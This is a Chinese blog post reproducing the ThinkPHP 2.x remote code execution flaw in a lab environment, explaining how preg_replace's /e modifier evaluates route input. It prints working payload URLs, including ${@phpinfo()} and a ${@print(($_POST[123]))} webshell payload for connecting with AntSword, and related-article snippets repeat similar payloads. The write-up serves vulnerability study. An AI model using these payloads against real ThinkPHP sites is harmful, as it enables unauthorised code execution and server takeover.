thinkphp-2x-rce 代码执行

最新推荐文章于 2024-04-30 00:10:58 发布
最新推荐文章于 2024-04-30 00:10:58 发布
阅读量379 收藏
点赞数
分类专栏: 漏洞复现 文章标签: thinkphp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzl_007/article/details/120380345
版权

thinkphp-2x-rce 代码执行

打开环境

在这里插入图片描述

漏洞描述

ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 。

在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

漏洞复现

直接访问

/index.php/a/b/c/${@phpinfo()}

在这里插入图片描述

蚁剑连接

payload:

/index.php/a/b/c/${@print(($_POST[123]))}

image-20210919140814220

image-20210919140909250

漏洞分析

preg_replace这个函数是个替换函数,而且支持正则,使用方式如下:

preg_replace('正则规则','替换字符','目标字符')

e 配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行;  
/e 可执行模式,此为PHP专有参数,例如preg_replace函数。

这里的preg_replace函数如下:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

用户输入的字符会插入到"\2",此处的双引号中进行执行

事实上payload:/index.php?s=/xxx/xxx/xxx/${@phpinfo()},这样即可运行了

详细分析参考:
https://blog.csdn.net/qq_41832837/article/details/109744538
https://www.freebuf.com/column/223149.html

yyyyzzzllll
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP2-RCE漏洞复现
qq_51459600的博客
06-08 1173
影响版本:PHP 5.2~5.6/e 修 正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。
ThinkPHP 2.x 任意代码执行漏洞
EC_Carrot的博客
08-17 133
漏洞详细 详细请看:https://vulhub.org/#/environments/thinkphp/2-rce/ 漏洞复现 直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行代码phpinfo():
thinkphp2-rce远程代码执行漏洞
weixin_45653478的博客
04-27 385
ThinkPHP 2.x版本中,使用的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
thinkphp 2.x 任意代码执行
qq_41048303的博客
12-16 1770
thinkphp 2.x任意代码执行 1.漏洞概述 ​ ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); ​ 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 ​ ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。 2.环境搭
ThinkPHP5--rce远程代码执行
最新发布
m0_74402888的博客
04-30 519
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8246
ThinkPHP5系列远程代码执行漏洞复现(详细)
thinkphp-bjyblog 开源博客系统 v1.1
10-11
对于初学者而言,`thinkphp-bjyblog-master`目录下的源代码是学习ThinkPHP框架的一个宝贵资源。通过阅读和研究这些代码,你可以了解到如何使用ThinkPHP搭建一个完整的Web应用,包括数据库设计、控制器逻辑、视图渲染...
ThinkPHP-request函数远程代码执行1
08-03
在2019年1月11日,ThinkPHP框架被曝出存在一个严重的远程代码执行RCE)漏洞,该漏洞主要涉及ThinkPHP 5.0.*版本。这个漏洞的根源在于框架处理HTTP请求方法的方式,特别是`isGet`、`isPost`、`isPut`、`isDelete`、...
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
thinkphp-bjyblog源代码
09-04
闲暇之时使用thinkphp开发了一个个人博客用来整理技能知识;... 亦可以作为初学thinkphp的同学们的参考源代码; 此博客程序前后台页面以及逻辑代码的都由我手工打造;没有版权限制;可以随意折腾; 想
漏洞通告ThinkPHP远程代码执行漏洞
05-05
【漏洞通告】ThinkPHP远程代码执行漏洞
thinkphp远程代码执行exp
07-29
thinkphp的远程代码执行漏洞的exp,版本通用,带检查,上传等功能。
ThinkPHP框架漏洞总结
weixin_42345596的博客
08-25 3800
Thinkphp简介 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/U
[代码审计]ThinkPHP5的文件包含漏洞
Huamang的博客
11-03 1104
漏洞影响范围 加载模版解析变量时存在变量覆盖问题,导致文件包含漏洞的产生 漏洞影响版本:5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10 tp框架搭建 tp框架由两部分组成 应用项目: https://github.com/top-think/think 核心框架: https://github.com/top-think/framework 框架下载好后,需要更名为thinkphp 访问localhost/tp5.0.1/publi
ThinkCMFX文件包含漏洞
冠霖L的博客
11-03 1961
0x00 漏洞简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,从而能够达到远程代码执行 0x01 影响范围 1.6.0 < ThinkCMFX < 2.3.0 0x02 环境搭建 使用ThinkCMFX2.2.0版本搭建,利用中间件phpstudy运行搭建的网站,网站一键安装即可 ...
ThinkPHP5.0使用命令行执行代码逻辑
BoYou233的博客
07-23 1878
创建一个自定义命令类文件,新建application/common/command/Hello.php <?php namespace app\common\command; use think\console\Command; use think\console\Input; use think\console\input\Argument; use think\console\input\Option; use think\console\Output; use think\Db; cl
thinkphp 5.x~3.x 文件包含漏洞分析
weixin_30256505的博客
05-11 530
漏洞描述: ThinkPHP在加载模版解析变量时存在变量覆盖的问题,且没有对$cacheFile进行相应的消毒处理,导致模板文件的路径可以被覆盖,从而导致任意文件包含漏洞的发生。 主要还是变量覆盖的问题。 漏洞范围: 漏洞影响版本:5.0.0<=ThinkPHP5<=5.0.18、5.1.0<=ThinkPHP<=5.1.10 本地复现环境: ...
ThinkPHP5.0.*版本代码执行漏洞
热门推荐
锋刃科技的博客
01-12 3万+
我们先看处理请求的Request类,在thinkphp/ library/think/Request.php。 Method方法来获取当前的请求类型。 isGet、isPOST、isPUT等方法都调用了method方法来做请求类型的判断。 而在默认情况下,是有表单伪装变量的 在默认情况下,该变量值为_method 在Method方法中,将表单伪装变量对该方法的变量进行...
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行RCE)漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值